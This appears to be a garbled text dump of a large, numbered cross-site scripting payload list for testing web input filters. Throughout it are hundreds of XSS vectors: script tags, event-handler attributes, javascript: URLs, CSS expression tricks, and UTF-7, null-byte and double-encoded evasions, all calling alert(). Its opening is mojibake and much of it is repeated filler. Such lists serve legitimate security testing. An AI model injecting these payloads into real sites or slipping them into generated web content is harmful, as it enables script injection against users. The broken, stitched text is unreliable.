medium--> ˫дÈƹý£ºript>alert(4) ´óСд»ìÏýÈƹý£º onmouseover=¡¯alert(9)¡¯ >"'> >"'> "+alert(16)+" XSS Test XSS Test XSS Test XSS Test #alert(85) #alert(86) #alert(87) #alert(88) #alert(90) #alert(93) #javascript:alert(94) #*/alert(105) " #"-alert(107) #x #x 1532 right click me! lose focus! click this! copy this! right click this! copy this! double click this! drag this! focus this! input here! press any key! press any key! press any key! click this! hover this! hover this! hover this! click this! paste here! lose focus! click this! copy this! right click this! copy this! double click this! drag this! focus this! input here! press any key! press any key! press any key! click this! hover this! hover this! hover this! click this! paste here! 0000 000192 0002 0003 click '> ='> alert(225) %0a%0a.jsp %3c/a%3e%3cscript%3ealert(228)%3c/script%3e %3c/title%3e%3cscript%3ealert(229)%3c/script%3e %3cscript%3ealert(230)%3c/script%3e/index.html a.jsp/ "> "";'>out alert(262); .XSS{background-image:url("javascript.:alert(263)");} BODY{background:url("javascript.:alert(264)")} getURL("javascript.:alert(266)") a="get";b="URL";c="javascript.:";d="alert(267);";eval(a+b+c+d); "> <" javascript:alert(278); '`"><\x3Cscript>javascript:alert(285) '`"><\x00script>javascript:alert(286) \x3Cscript>javascript:alert(352) '"`> javascript:alert(355)javascript:alert(356)javascript:alert(357) --> --> --> --> --> `"'> test test test test test test test test test test test test test test "'`>ABCDEF "'`>ABCDEF '`"><\x3Cscript>javascript:alert(392) '`"><\x00script>javascript:alert(393) "'`><\x3Cimg src=xxx:x onerror=javascript:alert(394)> "'`><\x00img src=xxx:x onerror=javascript:alert(395)> ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test `"'> `"'> `"'> `"'> `"'> `"'> `"'> `"'> `"'> `"'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "/> "/> "/> "/> "/> "/> "/> "/> "/> `"'> `"'> `"'> `"'> `"'> `"'> `"'> alert(583)0 "> "> foo=">"> foo=">"> <% foo> XXX X @import "data:,*%7bx:expression(javascript:alert(643))%7D"; XXXXXX / style=x:expression\28javascript:alert(645)\29> X ¼script¾javascript:alert(652)¼/script¾ X 654 655 656 XXX x XSS XSS""","XML namespace."),("""<IMG SRC="javascript:javascript:alert(693)"> X && javascript:alert(702); ]] test708 test709 ';alert(711))//';alert(711))//"; alert(712))//";alert(712))//-- >">'> xxs link xxs link "> perl -e 'print "";' > out < XSS exp/* ¼script¾alert(754)¼/script¾ echo('alert(766)'); ?> +ADw-SCRIPT+AD4-alert(768);+ADw-/SCRIPT+AD4- /*%00*/alert(770)/*%00*/"> http://www.googlealert(775)) X X http://www. style="x:"> <--` --!> x CLICKME ‘; alert(800); ‘)alert(801);// /*%00*/alert(809)/*%00*/"> http://www.googlealert(814)) X X http://www. style="x:"> <--` --!> x CLICKME ‘;alert(839))//’;alert(839))//”;alert(839))//”;alert(839))//–>”>’> ”> < %253cscript%253ealert(845)%253c/script%253e “>alert(846) foo ipt>alert(848)ipt> <"';alert(856))//\';alert(856))//";alert(856))//\";alert(856))//-->">'> < <"';alert(859))//\';alert(859))//";alert(859))//\";alert(859))//-->">'> ';alert(860))//\';alert(860))//";alert(860))//\";alert(860))//-->">'>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 &search=1 0&q=';alert(863))//\';alert%2?8863))//";alert(String.fromCharCode?(88,83,83))//\";alert(863)%?29//-->">'>&submit-frmGoogleWeb=Web+Search ... lol foo=">"> "> foo=">"> foo=">"> <% foo> LOL <SCRIPT>alert(877)</SCRIPT> \\";alert(878);// </TITLE><SCRIPT>alert(879);</SCRIPT> <INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert(880);\"> <BODY BACKGROUND=\"javascript:alert(881)\"> <BODY ONLOAD=alert(882)> <IMG DYNSRC=\"javascript:alert(883)\"> <IMG LOWSRC=\"javascript:alert(884)\"> <BGSOUND SRC=\"javascript:alert(885);\"> <BR SIZE=\"&{alert(886)}\"> <LINK REL=\"stylesheet\" HREF=\"javascript:alert(887);\"> <STYLE>li {list-style-image: url(\"javascript:alert(888)\");}</STYLE><UL><LI>XSS žscriptualert(889)ž/scriptu <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert(890);\"> <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert(891);\" <IFRAME SRC=\"javascript:alert(892);\"></IFRAME> <FRAMESET><FRAME SRC=\"javascript:alert(893);\"></FRAMESET> <TABLE BACKGROUND=\"javascript:alert(894)\"> <TABLE><TD BACKGROUND=\"javascript:alert(895)\"> <DIV STYLE=\"background-image: url(javascript:alert(896))\"> <DIV STYLE=\"background-image: url(javascript:alert(897))\"> <DIV STYLE=\"width: expression(alert(898));\"> <STYLE>@im\port'\ja\vasc\ript:alert(899)';</STYLE> <IMG STYLE=\"xss:expr/*XSS*/ession(alert(900))\"> <XSS STYLE=\"xss:expression(alert(901))\"> xss:ex/*XSS*//*/*/pression(alert(902))'> <STYLE TYPE=\"text/javascript\">alert(903);</STYLE> <STYLE>.XSS{background-image:url(\"javascript:alert(904)\");}</STYLE><A CLASS=XSS></A> <STYLE type=\"text/css\">BODY{background:url(\"javascript:alert(905)\")}</STYLE> <SCRIPT>alert(906);</SCRIPT> <BASE HREF=\"javascript:alert(907);//\"> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert(908)></OBJECT> d=\"alert(909);\\")\"; <XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert(910);\">]]> <XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- -->cript:alert(911)\"></B></I></XML> <t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>alert(912)</SCRIPT>\"> echo('IPT>alert(913)</SCRIPT>'); ?> <META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert(914)</SCRIPT>\"> <HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert(915);+ADw-/SCRIPT+AD4- <IMG SRC=\"javascript:alert(916)\" <<SCRIPT>alert(917);//<</SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(918)> <IMG SRC=\" javascript:alert(919);\"> perl -e 'print \"<SCR\0IPT>alert(920)</SCR\0IPT>\";' > out perl -e 'print \"<IMG SRC=java\0script:alert(921)>\";' > out <IMG SRC=\"jav ascript:alert(922);\"> <IMG SRC=\"jav ascript:alert(923);\"> <IMG SRC=\"jav ascript:alert(924);\"> <IMG SRC=javascript:alert(925)> <IMG SRC=javascript:alert(926))> <IMG \"\"\"><SCRIPT>alert(927)</SCRIPT>\"> <IMG SRC=`javascript:alert(928)`> <IMG SRC=javascript:alert(929)> <IMG SRC=JaVaScRiPt:alert(930)> <IMG SRC=javascript:alert(931)> <IMG SRC=\"javascript:alert(932);\"> ';alert(933))//\';alert(933))//\";alert(933))//\\";alert(933))//--></SCRIPT>\">'><SCRIPT>alert(933))</SCRIPT> ';alert(934))//\';alert(934))//";alert(934))//\";alert(934))//-->">'> "> < \";alert(943);// ¼script¾alert(945)¼/script¾ exp/* TESTHTML5FORMACTION crosssitespt foo=">"> "> foo=">"> ;969 +ADw-script+AD4-alert(974)+ADw-/script+AD4- %2BADw-script+AD4-alert(975)%2BADw-/script%2BAD4- +ACIAPgA8-script+AD4-alert(976)+ADw-/script+AD4APAAi- %253cscript%253ealert(977)%253c/script%253e “>alert(978) “> “>< foo ipt>alert(982)ipt> ‘; alert(983); var foo=’ foo\’; alert(984);//’; "> ';alert(992))//';alert(992))//";alert(992))//";alert(992))//-->">'> 0\"autofocus/onfocus=alert(993)-->"-confirm(3)-" xxs link xxs link "> < XSS xss:ex/*XSS*//*/*/pression(alert(1029))'> ¼script¾alert(1034)¼/script¾ echo('alert(1047)'); ?> +ADw-SCRIPT+AD4-alert(1049);+ADw-/SCRIPT+AD4- 0\"autofocus/onfocus=alert(1050)-->"-confirm(3)-" veris-->group element[attribute=' [[" onmouseover="alert(1054);" ] ipt>alert(1055)ipt>ipt>alert(1055)ipt> iPt>alert(1056)IPt> %253Cscript%253Ealert(1057)%253C%252Fscript%253E ">">123 ">123 ">123 ">123 ">">123 ">123 /**/alert(1147)/**/"> http://www.googlealert(1152)) X X http://www. style="x:"> <--` --!> x CLICKME '`"><\x3Cscript>javascript:alert(1184) '`"><\x00script>javascript:alert(1185) \x3Cscript>javascript:alert(1251) '"`> javascript:alert(1254)javascript:alert(1255)javascript:alert(1256) --> --> --> --> --> `"'> test test test test test test test test test test test test test test "'`>ABCDEF "'`>ABCDEF '`"><\x3Cscript>javascript:alert(1291) '`"><\x00script>javascript:alert(1292) "'`><\x3Cimg src=xxx:x onerror=javascript:alert(1293)> "'`><\x00img src=xxx:x onerror=javascript:alert(1294)> ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test `"'> `"'> `"'> `"'> `"'> `"'> `"'> `"'> `"'> `"'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "/> "/> "/> "/> "/> "/> "/> "/> "/> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> `"'> `"'> `"'> `"'> `"'> `"'> `"'> alert(1497)0 "> "> foo=">"> foo=">"> <% foo> XXX X @import "data:,*%7bx:expression(javascript:alert(1557))%7D"; XXXXXX / style=x:expression\28javascript:alert(1559)\29> X ¼script¾javascript:alert(1566)¼/script¾ X 1568 1569 1570 XXX x XSS XSS""","XML namespace."),("""<IMG SRC="javascript:javascript:alert(1607)"> X && javascript:alert(1616); ]] test1622 test1623 ';alert(1625))//';alert(1625))//"; alert(1626))//";alert(1626))//-- >">'> xxs link xxs link "> perl -e 'print "";' > out < XSS exp/* ¼script¾alert(1668)¼/script¾
&& javascript:alert(702);
[" onmouseover="alert(1054);" ] ipt>alert(1055)ipt>ipt>alert(1055)ipt> iPt>alert(1056)IPt> %253Cscript%253Ealert(1057)%253C%252Fscript%253E ">">123 ">123 ">123 ">123 ">">123 ">123 /**/alert(1147)/**/"> http://www.googlealert(1152)) X X
&& javascript:alert(1616);